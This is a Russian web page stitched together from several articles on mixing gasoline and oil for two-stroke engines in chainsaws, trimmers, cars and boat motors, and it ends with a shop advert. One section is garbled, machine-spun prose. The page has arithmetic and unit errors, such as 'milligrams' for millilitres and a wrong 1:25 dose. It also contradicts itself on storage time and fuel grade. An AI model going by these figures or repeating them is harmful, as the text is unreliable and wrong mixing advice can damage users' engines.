56 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Как разбавить бензин для двухтактных двигателей

Как смешивать масло с бензином для 2-х тактных двигателей

Соотношение масла и бензина представляет для двухтактных двигателей основной вид топлива. Топливная смесь гарантирует продуктивную работу мотора, способствует сохранению его движущих частей и уменьшению количества поломок.

Топливо и масло для приготовления смеси

Правильно приготовить топливную смесь – не всегда просто. Нужно правильно рассчитать пропорции, смешать жидкости и правильно хранить готовую смесь. Некоторые водители используют собственные рецепты, добавляя свои «секретные» ингредиенты, среди которых может быть даже газировка. Чтобы приготовление топливной смеси не было проблемой, нужно придерживаться нескольких простых правил и следовать инструкции от производителя.

Для приготовления смеси используют стандартный бензин и масло от различных производителей. Бензин какой марки следует использовать для приготовления масляной топливной смеси? Некоторые ошибочно полагают, что лучше всего подходит бензин 80-й марки, ведь в нём множество различных присадок. Это отчасти является правдой, однако это не делает его лучше бензина 92-й и 95-й марок.

Тем более достать бензин 80-й марки в России очень трудно, ведь не один крупный производитель топлива в стране сейчас его не выпускает. Поэтому лучшим вариантом является бензин 95-й марки, который имеет практически одинаковую стоимость, что и бензин 92-й марки.

Какое масло лучше всего подходит для приготовления смеси? Всё зависит от предпочтений водителя в том или ином производителе. Единственное, важно использовать масло только по предназначению. Если масло для трактора или лодки – то для автомобиля его применять не стоит.

Правила приготовления топливной смеси

Процесс приготовления топливной смеси следует начинать с детального ознакомления с приложенной к ней инструкцией. Как упоминалось на начале статьи, некоторые водители, обладающие, по их мнению, невероятным опытом, всё делают «на глаз». Конечно, со временем каждый водитель знает, как и что необходимо делать, однако каждая смесь имеет свои отличия, поэтому ознакомится с советами от производителя никогда не будет лишним.

К главным правилам эксплуатации топливной смеси относятся:

  • Ни в коем случае не уменьшать пропорции масла по отношению к бензину. Масло – дорогостоящий компонент, поэтому многие решают на нём экономить. Однако недостаточное количество масла в смеси приводит к сильному нагреву поршня и цилиндра двигателя. Из-за этого появляются задиры, что в итоге приводит к необходимости проведения серьёзного ремонта.
  • Не использовать слишком много масла по отношению к бензину. Увеличение пропорций масла также является губительным для работы двигателя. Излишнее количество масла приводит к увеличению нагара и быстрому износу двигательного механизма. Ремонт в таком случае обойдётся так же дорого, как и в первом случае.
  • Нельзя хранить приготовленную смесь дольше 30 дней. В противном случае она теряет свои свойства и использование такой смеси, может причинить вред двигателю.
  • Нельзя допускать попадания грязи, пыли и другого механического мусора, из-за которого двигатель может прийти в негодность.

Пропорции и процесс смешивания

Как определить пропорции для смешивания масла с бензином? Стандартные пропорции должны быть указаны на ёмкости с маслом. Количество используемого масла может отличатся в зависимости от производителя, однако зачастую используются пропорции 1:40 или 1:50. Допускается небольшое отклонение от такого соотношения – это не повлечёт серьёзных последствий.

Определив точные пропорции, нужно переходить к непосредственному приготовлению смеси. В чём это можно сделать? Для этого подойдут различные ёмкости. Важно: ни в коем случае нельзя смешивать топливо с маслом непосредственно в бензобаке, вливая по очереди одну жидкость за другой – смесь всегда готовится отдельно и только потом потихоньку заливается в бензобак.

Для смешивания можно использовать самые разные приспособления, среди которых:

  1. Специальные ёмкости для смешивания. Это удобные канистры с двумя отдельными ответствиями – отдельно для бензина и масла. Чтобы приготовить смесь в такой таре, нужно лишь налить нужное количество жидкости, закрыть ёмкость и несколько раз наклонить канистру. Такие приспособления очень удобные, однако и стоят они достаточно дорого. Если смешивать смесь приходится достаточно часто, то стоит задуматься о приобретении такой тары.
  2. Обычные металлические и пластиковые канистры. Стандартные канистры – наиболее практичные приспособления. Стоит лишь быть внимательными при использовании пластиковых и стеклянных канистр, ведь при их использовании существует вероятность возникновения разряда электричества. Если необходимо приготовить небольшое количество смеси, можно использовать обычную пластиковую бутылку.
  3. Подручные средства. Для экономии средств многие используют подручные приспособления, например, детские рожки и даже шприцы. Такие средства не очень удобные, зато и стоят копейки.

Как и в чём хранить готовую смесь?

Производители рекомендуют хранить топливную смесь в чистой ёмкости, лучше всего в металлической. Ни в коем случае нельзя оставлять смесь под прямыми солнечными лучами, ведь это приведёт не только к потере её свойств, но и к другим очень неприятным последствиям. Максимальный срок хранения готовой смеси – 30 дней.

В зависимости от частоты использования автомобиля, некоторые водители готовят смесь раз в неделю, другие – раз в месяц. Конечно, не каждый владелец имеет время, чтобы постоянно измерять пропорции и смешивать топливо с маслом. Важно помнить, что чем «свежее» смесь – тем лучше она для двигателя.

Многие в качестве тары для хранения смеси используют пластиковые канистры и бутылки. Это удобно и практично. Для небольшой пластиковой бутылки всегда найдётся место. Однако в этом стоит быть осторожными. Дело в том, что при длительном хранении в таре из пластика, топливная смесь в прямом смысле может «проесть» в ней дыру. Процесс разъедания пластика проходит очень быстро. Поэтому лучше всего использовать металлическую тару.

Возможно это не так удобно, но зато более надёжно. Если всё же есть необходимость использования пластиковой канистры, то помните, что хранить в ней смесь можно не более двух — трёх дней. Далее её нужно перелить в другую тару.

Признаки неправильного использования

Использование загрязнённой или диспропорциональной смеси может привести к серьёзным неисправностям в работе двигателя. Если вы ошиблись при смешивании – ничего страшного, ведь автомобиль сам вам об этом скажет. Вам нужно лишь быть внимательным к некоторым признакам, среди которых:

  • Появление грязи и различных отложений на карбюраторе.
  • Быстрое загрязнение топливного фильтра, расположенного в бензобаке.
  • Окисление стенок карбюратора и потеря эластичности резиновой диафрагмы в различных частях бензобака. Этот признак проявляется лишь при длительном хранении непригодной смеси непосредственно в бензобаке автомобиля.

Образование смолистых отложений в районе карбюратора.

При малейшем проявлении одного из признаков необходимо внести изменения в процесс смешивания, подобрав более подходящие пропорции. Таким образом можно подобрать идеальную топливную смесь и избежать серьёзных нарушений в работе двигателя.

Чтобы самостоятельно приготовить правильную топливную смесь, которая обеспечит идеальную работоспособность двигателя, необходимо использовать подходящее топливо, чётко придерживаться указанных производителем пропорций, использовать подходящую ёмкость и хранить готовую смесь не дольше 30 дней. Придерживаясь этих правил, вы приготовите идеальную смесь для двигателя вашего автомобиля.

Видео: приготовление топливной смеси для двухтактного двигателя

Бензин с маслом для бензопил — как разбавлять и зачем это делается

В основе бензопил разных фирм заложен двухтактный двигатель внутреннего сгорания, который приводит в действие режущую гарнитуру инструмента. Для приведения в действие ДВС применяются пропорции бензина с маслом для бензопил. Соединение бензина с маслом является обязательной процедурой, поэтому если вы только купили инструмент, то нужно разобраться в особенностях его заправки.

Зачем бензин перемешивается с маслом для заправки бензопил

Разводить бензин с маслом нужно во избежание выхода из строя ДВС. Причиной этого являются конструктивные особенности системы смазки двухтактных моторов. В конструкции таких двигателей отсутствует камера для заливания моторного масла, и если заливать топливо без смазывающего материала, то коленчатый вал, поршень, подшипники и шатуны не будут получать смазку. Это значительно сократит срок службы всех перечисленных деталей, поэтому заливать чистое топливо запрещается.

Бензин и масло для бензопилы требуется заливать в соответствующих пропорциях, что дает возможность эффективного смазывания трущихся деталей. Недостаток смазки или ее избыток приведет к негативным последствиям в виде образования нагара. Чтобы инструмент работал исправно, нужно с первого дня эксплуатации инструмента заправлять его не только качественными материалами, но еще и соблюдать правильные пропорции.

Чтобы двигатель работал исправно, главное заливать в него чистое горючее без загрязнений.

Соотношение бензина и масла для бензопил

Пропорции масла и бензина для заправки двухтактных двигателей бензопил разных марок составляет 40 к 1 или 50 к 1. Такое соотношение является стандартным, которым пользуются не только новички, но и опытные пильщики. Именно такое соотношение для приготовления топливной смеси является близким к идеальному, и обеспечивает смазку трущихся деталей кривошипно-шатунного механизма и поршня.

Сколько же масла нужно лить в бензин в миллилитрах? В расчете на мл пропорции масла и бензина 1 к 50 составляет 20 мл на 1 литр. Чтобы приготовить правильную смесь, следует набрать в пластиковую бутылку 1 литр бензина, и развести его с 20 мл масла. Чтобы правильно отмерить, сколько лить масла, следует взять специальную мерную емкость, и наполнить ее до соответствующей отметки. Если сразу планируется приготовить 2 литры топлива, то на это количество бензина нужно добавить 40 мл смазывающего материала.

Имеются и другие соотношения, которые предлагают разные производители. Эти значения соотношений отличаются незначительно, но если вы вычитали в паспорте к инструменту другие значения, то требуется именно их и придерживаться. Значение 1 к 50 или 40 являются стандартизированными. Заливать на 1 литр горючего 15 мл масла нужно в летнее время, а зимой доливать не меньше 20-25 мл. Зная рецепт приготовления смеси, следует разобраться еще в вопросе, какой бензин заливать в бензопилу?

Бензин и масло для бензопил – какое лучше

Часто новички спрашивают, а какой лучше брать бензин для своего инструмента? Чтобы не ошибиться в выборе, рекомендуется ознакомиться с инструкцией к инструменту. В инструкции каждый производитель указывает соответствующую марку топлива. Если производителем указывается, что октановое число не должно быть ниже 95, значить лить 92 бензин не рекомендуется.

Теперь разберемся, какое масло лучше брать для моторов бензопил. Для таких целей применяются специальные масла. Брать моторные масла двигателей автомобилей для приготовления топливной смеси запрещается. Для бензопил нужно купить смазочный материал для двухтактных моторов, которые есть в продаже не только в специализированных центрах, но и в интернет магазинах.

Моторные масла для двухтактных моторов выпускаются такими производителями:

Обычно соотношение указывается на бутылке со смазочным материалом, поэтому запутаться с приготовлением топливной смеси будет трудно даже новичкам. Ни под каким предлогом не используйте отработку даже в качестве смазывающего материала цепи. Это приведет к тому, что уже вскоре понадобиться проводить ремонт инструмента.

Инструкция по заправке топлива в бензопилу

Зная соотношения приготовления бензо-масляной смеси, можно приступать к ее заправке. Инструкция по заправке имеет следующий вид:

  1. Для начала нужно приготовить смесь. Соединив два основных компонента, следует тщательно их размешать
  2. Инструмент расположить на чистой и ровной поверхности. Перед тем, как откручивать крышку бензобака, требуется очистить или продуть опилки, пыль и загрязнения
  3. Горловина бака должна смотреть вверх
  4. Установить в горловину маленькую лейку, после чего заливать топливо
  5. Контролируйте процесс заправки, так как объем бака небольшой, поэтому он быстро заполняется
  6. Заливать не до полного максимума, так как при закрытии крышки бака остатки топлива выплеснутся наружу
  7. После того, как топливо будет залито в бак, сразу же нужно доливать смазку для цепи
  8. Расход топлива и смазки цепи приблизительно одинаково, поэтому и заправлять оба бака необходимо одновременно
  9. После заправки можно приступать к запуску мотора

Заводить мотор лучше не на том месте, где осуществлялась заправка, а переместиться на расстояние 2-3 м. Инструмент готов к работе, и можно приступать к его запуску. Как запускается двигатель бензопилы, можно прочесть в этом материале (ссылка).

Что будет если залить отработку в бензопилу

Если вы не хотите, чтобы ваша бензопила отказала в неподходящий момент, используйте исключительно качественные горюче-смазочные материалы. Смешивать отработку с бензином запрещено. Причинами того являются следующие факторы:

  • Другая вязкость материала, поэтому отработка не способна обеспечивать эффективную смазку трущихся деталей и механизмов
  • В отработке содержатся мелкие частицы металла и стружка, которые попадая в бак, повлекут засорение топливного фильтра и канала. Если смазка попадет в цилиндр вместе с мелкими частицами, то они оставят свой отпечаток в виде ускоренного износа поршневых колец
  • Выделение большого количества черного дыма, что говорит о горении масла

Заливать суррогатные материалы нельзя не только в бак с бензином, но и в бак для смазки цепи. Что будет, если использовать отработку в баке для смазки цепи, можно увидеть на видео.

Используя инструкцию, можно самостоятельно приготовить правильную топливную смесь, на которой будет работать бензопила. При неправильном разбавлении топливной смеси снижается не только ресурс инструмента, но и снижается его производительность.

Как разбавить бензин с маслом для бензопилы

Бензопила используется при резке деревьев, в ремонтных работах. Популярность этого инструмента растет с каждым годом. Каждый хозяин покупает ее себе в дом. Однако, чтобы пользоваться ею длительное время, необходимо правильно ухаживать за инструментом. Только при качественном уходе пила прослужит долгу жизнь и не принесет вреда вашему здоровью.

Особенно это касается в бензиново-масляной смеси. Ее необходимо разбавлять и заливать строго по инструкции, которая будет дана ниже.

Зачем нужно разбавлять смазочный материал

В самом начале необходимо разобраться с причиной разбавления горючего. Смесь, используемая для бензопилы, разбавляется в первую очередь для продления службы ее владельцу. В инструкции к ней строго запрещается эксплуатация без разбавления бензина.

Основу мотора бензопилы составляет поршневой двигатель внутреннего сгорания. Он состоит только из цилиндра, поэтому не имеет дополнительных систем для смазывания деталей. Смесь поступает в него, оседает, смазывает поршневые кольца и стенки. В таких инструментах, как бензопилы, масло с бензином выступает единственной в своем роде смазывающей жидкостью. Смесь продляет срок службы функционирования всех деталей.

Кроме того, она содержит присадки, которые полезны для работы двигателя. Обладает противоокислительными, консервирующими и другими свойствами, которые тоже полезны для двигателя и его деталей.

Какие существуют пропорции, чтобы разбавить компоненты для смеси

Качественная работа бензопилы будет зависеть от правильной заправки бензопилы смесью из смазочных материалов и горючего. Для определения пропорции компонентов и как разбавлять топливо, рекомендуется почитать инструкцию. Если забыли, как разбавлять, или потеряли инструкцию — можете обратиться в интернет за помощью. Следует сказать, что пропорция между маслом и бензином для бензопилы должна соблюдаться в точности.

Самым распространенным соотношением бензина к маслу является пропорция 1:50.

То есть один литр бензина разбавляется двадцатью миллиграммами смазочного материала. Это соотношение вполне подойдет для инструментов, мощность которых составляет более или полтора киловатта в час.

Для тех бензопил, мощность которых менее полтора киловатта в час, рекомендуется смешивать бензин с маслом в пропорции 1:25. То есть один литр бензина разбавляется двадцать пятью миллиграммами моторного масла.

Необходимо помнить, что присутствие большого количества масла в бензине приведет к быстрому износу деталей. При превышении уровня происходит повышение нагрузок на цилиндр и поршень. Быстрее образуется нагар.

Разбавлять бензин рекомендуется в отдельной емкости. Нельзя наливать вначале горючее в бензобак. И наоборот. Необходимо добавлять масло в канистру специальными инструментами для этого предназначенными. В магазинах продаются дозаторы, шприцы. На крайний случай можно использовать лейку, сделанную из пластиковой бутылки.

Кроме инструкции, необходимо знать какое масло надо добавить для бензопилы. Так как разновидностей много, то обычному владельцу бензопилы сложно выбрать наилучшее из предложенных. Рассмотрим некоторые из них.

Пропорции бензина и масла

Например фирма Stihl вместе с качественными пилами выпускает специальные смазочные материалы, которые используются в этих инструментах. Специальные масла выпускаются такими фирмами, как:

Вышеперечисленные три компании являются одновременно производителями бензопил и специальных смазочных материалов к ним. Следующим этапом в правильном обслуживании инструмента будет алгоритм заправки пилы.

Как заправлять пилу

Для заправки бензопилы лучше всего подойдет пластиковая бутылка. Объем емкости должен быть равен двум литрам, если вы часто будете использовать инструмент. Емкость поменьше следует использовать тогда, когда вы редко пользуетесь пилой.

Разбавлять горючее и смазочный материал необходимо в отдельной бутылке. Необходимо соблюдать точные пропорции, которые указаны в инструкции. Рекомендуется оставить пустое место для того, чтобы жидкость хорошо перемешать.

Храниться такая смесь должна не больше двух недель. Перед использованием обязательно надо встряхнуть бутылку. Специалисты не рекомендуют разбавлять большое количество смеси сразу и хранить ее годами. Температура хранения не должна превышать более двадцати пяти градусов по Цельсию. Если же больше, то сроки хранения уменьшаются.

Заправка бензопилы маслом

Длительное хранение смеси сильно ухудшает тяговые возможности двигателя. Образуется нагар, способность поршней к быстрому движению снижается.

Как разбавить компоненты смеси

Как уже было сказано выше, бензин с маслом следует разбавлять в специально приготовленной емкости. Не стоит это делать в бензобаке. Последняя технология приведет к тому, что часть масла попадет в карбюратор. В результате придется разбирать двигатель и мыть его.

Стандартные пропорции разбавления 50:1 и 40:1. Такая смесь не будет препятствовать сгоранию бензина в бензобаке и улучшит смазку трущихся деталей механизма. При обкатке нового инструмента желательно добавить смазочного материала на двадцать процентов больше. Разбавлять большим количеством масла рекомендуется в районах с высокой температурой воздуха.

Многим владельцам будет интересна информация о том, как же разбавить бензин с маслом, если нет мерной емкости. Для этого подойдет двадцати кубовый медицинский шприц. Хотя чаще всего мерные емкости входят в комплект к бензопилам.

Перед тем, как разбавлять топливо, необходимо почистить и обезжирить горлышко бензобака. Заливать желательно через фильтр. Фильтром будет служить любая тряпка

После использования необходимо оставшуюся смесь слить и утилизировать. Помните, что лучше перелить, чем недолить. Что же будет если не учитывать рекомендации, прочтете ниже.

Если действовать не по инструкции, то можно привести инструмент в нерабочее состояние. Например, если не разбавлять горючее, то нагар будет образовываться чаще, не произойдет необходимая смазка поршней, в результате чего поднимется температура в двигателе. А это приведет к тому, что поршни сломаются. Или владелец пилы будет в течении всей работы вдыхать токсичные пары в большом количестве. Тем самым он заработает проблемы со здоровьем, сломает инструмент.

Смешивание масла и бензина

Если использовать смазочный материал и горючее низкокачественные, то они также могут привести к поломке двигателя. Не рекомендуется разбавлять моторное масло, изготовленное для автомобилей. Топливо нужно покупать с высоким октановым числом.

Обзор производителей масел для двигателей внутреннего сгорания

Смазочное средство фирмы Штиль «Stihl» является одним из таких масел, которые используются непосредственно для бензопил. В магазины они поступают в бутылках и канистрах по 5 литров. Такой тип относится к минеральным. Они имеют дешевую стоимость продажи. Однако менее качественные, чем синтетические.

Синтетические материалы долго сохраняют свои смазочные качества. При увеличении температуры они способны не выгорать после первого же нагрева. Не выделяют токсичные вещества, которые могут повредить здоровье владельца.

Смазочный материал Husqvarna используется для смазки двигателей бензопил этой же фирмы. Его необходимо разбавлять в бензине в пропорции 1:50. Или 20 граммов на один литр горючего. Смазку двигателей от производителей другой фирмы надо разбавлять в пропорции равной 1 к 33. То есть 30 граммов на один литр бензина. Этот компонент для разбавления горючего состоит из минеральных элементов на семьдесят процентов. Синтетические примеси тоже добавлены. Но их доля составляет малую часть – 30 процентов. Эта смазка предназначена для стран СНГ, где с качественным бензином имеются проблемы.

«Kreissman», пример которого был приведен выще, используется для двухтактных двигателей бензопил. Разбавлять масло с горючим надо в тех же пропорциях, которые указаны были выше. «Kreissman» не дает образовываться нагару, отлично смазывает поршни и другие детали двигателя.

Производители инструмента обычно комплектуют бензопилу с собственным материалом для смазывания. Так достигается наилучшее соотношение смазочных свойств и увеличивается срок службы пилы.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Как разбавить бензин для двухтактных двигателей

  • 4 Апреля, 2019
  • Разное
  • Людмила Стороженко

Существуют определенные параметры для смешивания бензина с масляным составом. Это основной вид горючего для двухтактных двигателей. Полученное топливо обеспечивает работу мотора на долгий срок, и тем самым сохраняет его продуктивность. Как смешивать необходимые ингредиенты в пропорции 1 к 50, это сколько масла, будет рассмотрено далее.

Что нужно знать?

Выбор правильного соотношения для топливной массы не является простой задачей. Нужно рассчитать пропорции смешивания в соответствии с установленной нормой. Порой водители добавляют ингредиенты по своему усмотрению. В это же время дисциплинированные собственники транспортных средств, которые беспокоятся о двигателе, знают, что рекомендована пропорция 1 к 50. Это сколько масла? Ответ на этот вопрос вы найдете далее.

Для смешения ингредиентов нужно руководствоваться простыми правилами. Чтобы разбавить бензин маслом 1 к 50 рекомендуется использовать топливо марки А-92. Зачастую используют А-80, объясняя такое действие наличием в его составе большого количества присадок. Это в корне неправильно.

Масло практически любого производства подходит для смешивания с топливом. Главное, чтобы оно относилось к автогруппе, а не было предназначено для тракторов или моторных лодок. Такое масло применять не стоит. В противном случае оно явно сократит срок службы двигателя.

Рекомендации по приготовлению

Большинство водителей знает, что двухтактный двигатель работает на бензино-масляном топливе. Поэтому рекомендуется соблюдать пропорции, которые указаны в техпаспорте продукта.

Разумеется, что некоторые владельцы транспортных средств, обладающие большим опытом, создают пропорцию «на глаз». Однако каждый раз подобная масса будет иметь различное соотношение. Это неблагоприятно скажется на работе мотора. Поэтому нужно ознакомиться с инструкцией на упаковке.

Рекомендованные требования к эксплуатации смеси:

  1. Не следует снижать количество масляного компонента при смешивании с топливом. Нужно придерживаться пропорции 1 к 50. Это сколько масла? Нужно знать точное количество до заливки смеси в картер. Масло – компонент не из дешевых, поэтому на нем нередко пытаются сэкономить. Но это может поспособствовать сильному нагреву системы. Поэтому следует соблюдать пропорции масла. Также из-за недостаточного количества этого компонента могут появиться задиры, что заметно снижает продолжительность эксплуатации мотора.
  2. Также не следует использовать и обильное количество масла. Превышение его объема является негативным фактором для работы двигателя. Это приводит к быстрому износу мотора, к увеличению нагара.
  3. Не рекомендуется хранить подготовленную топливную смесь больше 30 дней. В противном случае она теряет нужные свойства, и ее использование значительно снизит срок службы двигателя.
  4. Требуется следить, чтобы не было попадания пыли, грязи в состав, так как это тоже негативно отразиться на работе мотора.

Пропорции смешивания

Часто стандартные пропорции смешивания указываются на емкости с маслом. И в основном используется соотношение 1 к 50. Это сколько масла следует добавить, рассмотрим ниже. Возможно небольшое отклонение от представленного соотношения. Но лучше придерживаться точных дозировок.

Итак, производители рекомендуют придерживаться пропорции 1 к 50. Это сколько масла нужно разбавить с бензином? Соотношение представленной пропорции достаточно простое:

  • 1 л бензина и 20 мл масла;
  • 1,5 л горючего и 30 мл масла;
  • 2 л топлива и 40 мл масла.

Для расчета применяется формула: 1 л / 50 * 1 000 = 20 мл.

Поэтому на литр бензина нужно 20 мл масла.

Для удобства можно воспользоваться медицинским шприцем для точного измерения объема смазочного состава или взять другую мерную емкость с делениями в миллилитрах.

Над выбором бензина для лодочного мотора не стоит размышлять – его марка не зря указывается в паспорте. На топливе, рекомендованном производителем, двигатель работает экономно, детали не выходят из строя раньше времени.

Споры о том, какой бензин заливать в лодочный мотор, связаны с его качеством: на российских нефтеперерабатывающих заводах делают только 92-й бензин, а 95-й на заправках – это на самом деле 92-й бензин, октановое число которого повышено с помощью железосодержащих антидетонационных присадок, метил-трет-бутилового эфира, бензола, метилового спирта, пропан-бутана.

Железосодержащие антидетонационные присадки создают токопроводящую пленку на свечах. Из-за этого сначала уменьшается энергия искры и растет расход топлива (до 40%), затем двигатель начинает троить, и свечи выходят из строя.

При сгорании бензина с добавлением метил-трет-бутилового эфира или бензола образуется много нагара на поршнях, что приводит к их заклиниванию.

Метиловый спирт гигроскопичен (поглощает влагу из воздуха). Результат: в бензобаке фальсифицированный 95-й бензин разделяется на исходный 92-й бензин и воду, которая оседает на дно.

Пропан-бутан не приносит вреда деталям: без давления он моментально испаряется, после чего 95-й бензин снова становится исходным 92-м. Переплата на 1 литре топлива – до 30%.

Вывод: если производитель рекомендует 95-й бензин, а импортного на заправке нет, лучше залить в лодочный мотор российский 92-й.

Как разбавить бензин для лодочного мотора

Двухтактные лодочные моторы с совмещенной системой смазки требуют приготовления топливной смеси из бензина и масла:

  • ● для обкатки – в пропорции 1:25 (1 л масла на 25 л бензина);
  • ● для дальних перемещений в высокоскоростном режиме, транспортировки тяжелых грузов – в пропорции 1:50 (1 л масла на 50 л бензина);
  • ● для перемещений с кратковременной работой двигателя на полных оборотах – в пропорции 1:75 (1 л масла на 75 л бензина);
  • ● для эксплуатации в ненапряженном режиме (троллинга, неспешных водных путешествий) допускается пропорция 1:100 (1 л масла на 100 л бензина), но опытные водномоторники предпочитают не экономить на масле до такой степени – на воде всякое случается.

Когда содержание масла в смеси превышает норму, мотор сильно дымит, в камере сгорания и на свечах образуется много нагара, происходит коксование колец поршня. Заниженная концентрация масла приводит к преждевременному износу движущихся деталей, заклиниванию двигателя на высоких оборотах.

Чтобы развести бензин, используйте только масло, предназначенное для водного транспорта (с маркировкой TC-W3) – оно содержит присадки, которые препятствуют образованию эмульсии при попадании воды, коррозии металла, ускоренному износу деталей.

Разбавить бензин маслом желательно в отдельной емкости – если компоненты вливать прямо в бак, они хуже перемешиваются, из-за чего возможны перебои в работе двигателя. Заливать смесь рекомендуется через воронку с фильтрующей сеткой, даже если топливо фильтровалось при ее приготовлении.

Не стоит готовить топливную смесь с большим запасом – чем дольше она хранится, тем сильнее окисляется масло. Из-за этого перестают работать присадки.

Учтите, что после вскрытия упаковки масло сохраняет рабочие свойства 6÷8 месяцев.

Чтобы не спутать топливную смесь с чистым бензином, покупайте масло зеленого, синего или красного цвета.

В интернет-магазине MARLIN MOTORS вы можете в один клик купить масло MARLIN Премиум 2Т, TC-W3 для двухтактников и масло MARLIN Премиум 4Т, SAE 10W30 для четырехтактных моторов.

Что это смесь бензина и масла для двухтактных движков? Двухтактные движки различной моторизированной техники работают на базе топливной консистенции бензина и масла. При правильном изготовлении и соблюдении баланса они работают длительно и безотказно. Напротив, если проход неверной эксплуатации появляются разные технические неисправности. Основная причина появления схожих ситуаций — это неверное составление пропорций топливных консистенций. Частичное по другому полное отсутствие масла в топливном баке тоже приводит к неисправностям. При изготовлении горючего употребляется особая масляная смесь, созданная для двухтактных движков. Хотя двухтактные движки нередко имеют различное назначение: от устройств для ухаживания за садом и прямо до лодочных моторов, все же метод изготовления топливных консистенций приблизительно схож.

Двухтактные движки различной моторизированной техники работают на базе топливной консистенции бензина и масла.

Чтоб знать, как верно приготовить топливную смесь, нужно в начале изучить эксплуатационными качествами техник, для в которой требуется предназначается горючее. Что существует, что российского автопрома прописывают различные по пропорциональному соотношению количества масла и бензина. Это зависит, в первую очередь, от устройства, на которое рассчитан горючий материал, кроме того частично от его неплохой сопоставимости с маслом. Пропорциональность может измеряться на сумму 1:40 иначе говоря 1:50. Иной раз числа измеряются как 1:80. Однако это не должно вводить в заблуждение. Нужно обратить особое внимание на саму канистру покупаемого масла либо на его аннотации по применению, где как правило бывают указаны нужные пропорции. Даже отклонение от рекомендуемой пропорции не должно очень навредить работе моторов. С учебника внедрения сомнительно случится что-то нехорошее, если будет прогорать весь бензиновый бак. Реально случалось, когда в топливный бак совместно с бензином выливали обыденное оливковое масло, которое употребляют для изготовления еды.

Как развести масло на триммер и бензопилу.

Иногда, по рассказам хозяев техники, для производства они использовали двухлитровую бутылку газировки Пепси и рюмочной водки, которые позже просто соединяли с бензином. Однако, даже несмотря на этот факт, движки отлично работали. Естественно, Этот расхожий слух экзотический и легкий метод изготовления лучше не использовать реально. При его нередком применении остается риск негативного воздействия таковой консистенции на работу двигательного агрегата в итоге.

В изготовлении горючей консистенции для двухтактных движков употребляется стандартный авто бензин. Встречаются несколько марок обширно применяемого горючего, любая где имеет свои достоинства.До того как использовать бензин, необходимо учитывать некие особенности:

  1. По вопросу пропорциональности лучше все-же ориентироваться на советы производителя данного вида горючего. В этом случае, если производитель бензина не оставил определенных советов по применению, выбор нужно делать меж 92-м или 95-м бензином. Однако предпочтение лучше отдавать последнему.
  2. Конечно неверное мировоззрение, которое говорит, что бензин хоть какой 80-й марки делают при помощи разных присадок, потому он лучше 95-го. Присадки всегда использовались, и такая тенденция будет продолжена. Увы аспект состоит в том, что 80-й бензин не производит практически ни какой большой производитель горючего у нас. А разница себестоимости 2-ух новейших марок фактически одна и та же. Никто на данный момент не получает 95-й бензин, используя 92-ю марку.

В итоге 95-я марка — это сбалансированный вариант для выбора горючего. Она не имеет противопоказаний и подходит для смешивания со спец маслом.

  1. Нужно из всей массы ассортимента избрать масло, предназначаемое для двухтактного мотора. Но выбор обязан обоснован покупкой масла для определенного вида техники. Если, например, на обложке написано, что масло для лодочной техники, то его нужно использовать для лодочной техники и не использовать, например, для производства топливной консистенции для бензопил. Это все связано с той целью, что нагрузка у обоих устройств различная, при этом плохо скажется на используемой технике. Единственное устройство, которое может потреблять масло для хоть какой двухтактной техники, это триммер. Но это быстрее исключение из правил.
  2. Непременно до эксплуатации масла нужно глядеть пропорциональность в его использовании совместно с бензином. Это принципиальное правило, однако его необязательно необходимо соблюдать в предельной точности. Маленькое отступление от данных пропорций допустимо, но большой разрыв приведет к нехорошим последствиям при работе двигательного агрегата.

что будет с движком бензопилы или триммера,если разбавлять бензин дешёвым маслом.

Выбор масла приемущественно находится в зависимости от 2-ух причин. 1-ый заключается в том, к какому устройству оно чем просто подходит. А 2-ой относится к предпочтениям покупателя к той либо другой фирме-производителю.

Пропорция масла и бензина для бензопилы: как разбавлять

Все современные бензопилы оснащаются двухтактным двигателем. Его долгое и бесперебойное функционирование прямо зависит от того, верна ли пропорция масла и бензина для бензопилы. Разнообразие марок инструмента и особенности каждого из них являются причиной того, что данная процедура непроста для большинства начинающих пользователей бензопил.

Почему нужно смешивать масло и бензин

При эксплуатации пилы бензин всегда должен смешиваться с маслом. Причина этого — конструктивные особенности двухтактного ДВС. Он не имеет выделенной системы смазки деталей (как в других ДВС) и соответственно его цилиндры с уплотнительными кольцами, коленвал, подшипники и шатуны должны смазываться непосредственно в процессе получения топлива.

Соотношение количества масла и бензина для топливной смеси

Пропорция масла и бензина для бензопилы обычно составляется по двум рецептам:

  1. 50 порций бензина на одну порцию моторного масла
  2. 40 порций бензина на одну порцию моторного масла

Если бензопила недавно приобретена и еще не эксплуатировалась, то долю смазки увеличивают на четверть. Столько же ее льют в топливо, ведя пиление при температурах ниже +2 градусов.

Получить такую смесь не составляет особого труда. Практически каждая современная пила комплектуется особой двухсекционной емкостью. В меньшую ее часть наливается масло, а в большую часть — бензин. Крышки обеих частей плотно закручиваются и емкость переворачивают, тщательно встряхивают. Этим добиваются полного и однородного смешения обоих компонентов.

Если такой специальной емкости нет, то можно воспользоваться любой стойкой к бензину пластиковой емкостью с крышкой объемом один литр и одноразовым шприцем на 5-10 кубиков. Емкость для бензина нужно предварительно очистить от разного рода загрязнителей и воды. После этого в нее наливают один литр 92-95 бензина.

Параллельно в шприц набирается 20 мл масла. Если заправка производится в холодное время, то его нужно взять 24-30 мл. Аккуратно вливаем его в емкость с бензином. Она плотно закрывается крышкой и тщательно встряхивается до полного смешивания компонентов.

Рекомендуемые марки ГСМ для питания бензопил

Конкретная марка бензина для пилы всегда приводится в инструкции от производителя. Рекомендуется строго ей следовать.

Масло бывает 2-х видов:

  • для двигателя,
  • для смазывания цепи и шины.

Не путайте и не применяйте их не по назначению. Это гарантированно приведет к поломке инструмента. Ремонт же его может стоить почти как новая пила.

Наиболее популярными смазочными маслами для бензопил являются следующие марки:

На каждой емкости с фирменным маслом всегда указывается пропорция масла и бензина для бензопилы (штиль, хускварна, партнер, урал), которой нужно придерживаться составляя смесь.

Пошаговая инструкция по заправке

Желая заправить бензопилу, нужно следовать простому алгоритму:

  1. Приготовить топливо в рекомендуемой пропорции бензина и масла для двухтактных бензопил.
  2. Подготовить пилу к заправке, очистив ее поверхность от опилок и стружки.
  3. Расположить пилу на плоской устойчивой подставке горлом бачка вверх.
  4. Аккуратно поместить в открытое горло бака небольшую воронку (пластиковую или металлическую, стойкую к ГСМ, легко приобрести подходящую в магазине автотоваров)
